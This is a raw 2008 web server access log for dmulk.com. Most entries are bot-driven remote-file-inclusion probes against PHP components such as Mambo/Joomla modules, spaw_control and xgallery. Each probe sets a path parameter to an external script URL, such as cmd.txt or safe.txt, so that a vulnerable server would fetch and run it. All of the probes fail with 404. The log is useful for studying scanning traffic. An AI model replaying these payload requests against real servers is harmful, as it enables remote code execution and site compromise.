64.22.125.219 - - [30/Jan/2008:14:02:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.30.136 - - [30/Jan/2008:14:03:17 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:14:04:32 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.6.59.91 - - [30/Jan/2008:14:06:48 -0800] "GET /index.php?pageurl=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [30/Jan/2008:14:07:35 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [30/Jan/2008:14:07:36 -0800] "GET /modifyform.html?code=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [30/Jan/2008:14:07:36 -0800] "GET /logs/modifyform.html?code=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [30/Jan/2008:14:07:42 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:14:08:56 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:14:08:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:14:08:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:14:09:10 -0800] "GET //login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:14:09:42 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:14:10:39 -0800] "GET //components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:14:10:39 -0800] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.52.114.58 - - [30/Jan/2008:14:12:20 -0800] "GET /logs/access_080101.log//dir/to/claroline/user/exercises_details.php?http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [30/Jan/2008:14:12:20 -0800] "GET /logs//dir/to/claroline/user/exercises_details.php?http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.19 - - [30/Jan/2008:14:12:20 -0800] "GET /tmp/ HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.114.58 - - [30/Jan/2008:14:13:30 -0800] "GET /logs/access_071228.log//dir/to/claroline/user/exercises_details.php?http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:14:14:43 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:14:14:47 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.148 - - [30/Jan/2008:14:17:40 -0800] "GET /logs/access_070708.log HTTP/1.0" 200 169855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.20.28 - - [30/Jan/2008:14:18:51 -0800] "GET /logs/access.log//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [30/Jan/2008:14:18:51 -0800] "GET //portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [30/Jan/2008:14:18:52 -0800] "GET /logs//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [30/Jan/2008:14:24:50 -0800] "GET /logs/access_071230.log//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:14:26:18 -0800] "GET /logs/access_071229.log//login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:14:26:18 -0800] "GET /logs//login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.134 - - [30/Jan/2008:14:26:25 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sf4dean.com/forums/Skin/s1/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [30/Jan/2008:14:27:08 -0800] "GET /logs//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.97.0.11 - - [30/Jan/2008:14:27:08 -0800] "GET //portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.27.33 - - [30/Jan/2008:14:27:40 -0800] "GET /tmp/?M=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:14:32:38 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:14:32:40 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:14:32:40 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.91.66.79 - - [30/Jan/2008:14:32:44 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [30/Jan/2008:14:33:33 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.79.190.28 - - [30/Jan/2008:14:33:39 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:14:34:14 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [30/Jan/2008:14:34:14 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:14:34:42 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:14:34:43 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [30/Jan/2008:14:34:43 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.33.119.12 - - [30/Jan/2008:14:35:20 -0800] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.0" 200 695 "http://www.st-owners.com/forums/showthread.php?t=33420&page=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "dmulk.com"
74.6.24.71 - - [30/Jan/2008:14:37:01 -0800] "GET /logs/access_070908.log HTTP/1.0" 200 91498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.237.123.245 - - [30/Jan/2008:14:37:34 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.11 - - [30/Jan/2008:14:37:54 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.125.219 - - [30/Jan/2008:14:38:56 -0800] "GET /logs/access_080106.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.157.174.120 - - [30/Jan/2008:14:38:56 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:14:40:11 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:14:40:11 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:14:40:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:14:40:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:14:40:12 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:14:40:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.119.180 - - [30/Jan/2008:14:40:32 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.188.9 - - [30/Jan/2008:14:40:51 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:14:40:52 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:14:40:52 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.189.27.130 - - [30/Jan/2008:14:40:58 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:14:41:41 -0800] "GET /logs/access_071225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.26 - - [30/Jan/2008:14:41:44 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:14:41:55 -0800] "GET /logs/access_071225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.236 - - [30/Jan/2008:14:42:19 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.35.191.105 - - [30/Jan/2008:14:42:44 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.26.118 - - [30/Jan/2008:14:42:59 -0800] "GET /funny/ HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.233.206 - - [30/Jan/2008:14:43:11 -0800] "GET //appserv/main.php?appserv_root=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.22.74.129 - - [30/Jan/2008:14:43:59 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:14:44:26 -0800] "GET /logs/access.log/admin/spaw/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:14:44:27 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:14:44:27 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.18.130.26 - - [30/Jan/2008:14:45:02 -0800] "GET //index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.53.147.60 - - [30/Jan/2008:14:45:16 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [30/Jan/2008:14:45:16 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [30/Jan/2008:14:45:16 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.53.147.60 - - [30/Jan/2008:14:45:16 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
217.160.246.215 - - [30/Jan/2008:14:45:48 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.160.246.215 - - [30/Jan/2008:14:45:48 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.160.246.215 - - [30/Jan/2008:14:45:48 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.160.246.215 - - [30/Jan/2008:14:45:48 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://physics.open.ac.uk/~jmarshall/P00006/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:53 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:54 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:58 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:58 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:45:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:14:46:32 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:14:46:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:14:46:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.107 - - [30/Jan/2008:14:46:57 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.79.190.28 - - [30/Jan/2008:14:48:12 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.79.190.28 - - [30/Jan/2008:14:48:12 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
150.161.5.91 - - [30/Jan/2008:14:48:22 -0800] "GET /logs/access_071230.log/admin/spaw/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:48:45 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:48:45 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.21 - - [30/Jan/2008:14:50:17 -0800] "GET /logs/access_080101.log/!scanhttp://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.21 - - [30/Jan/2008:14:50:21 -0800] "GET /!scanhttp://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.21 - - [30/Jan/2008:14:50:21 -0800] "GET /logs/!scanhttp://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.31.1 - - [30/Jan/2008:14:50:36 -0800] "GET /logs/access.log//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [30/Jan/2008:14:50:36 -0800] "GET //portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [30/Jan/2008:14:50:37 -0800] "GET /logs//portail/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [30/Jan/2008:14:51:22 -0800] "GET /logs/access_071229.log//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [30/Jan/2008:14:51:23 -0800] "GET /logs//index.php?cms=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:25 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:25 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:31 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:51:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:14:52:28 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:14:52:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [30/Jan/2008:14:52:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.204.31 - - [30/Jan/2008:14:52:44 -0800] "GET /index.php?option=com_alphacontent=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [30/Jan/2008:14:53:29 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
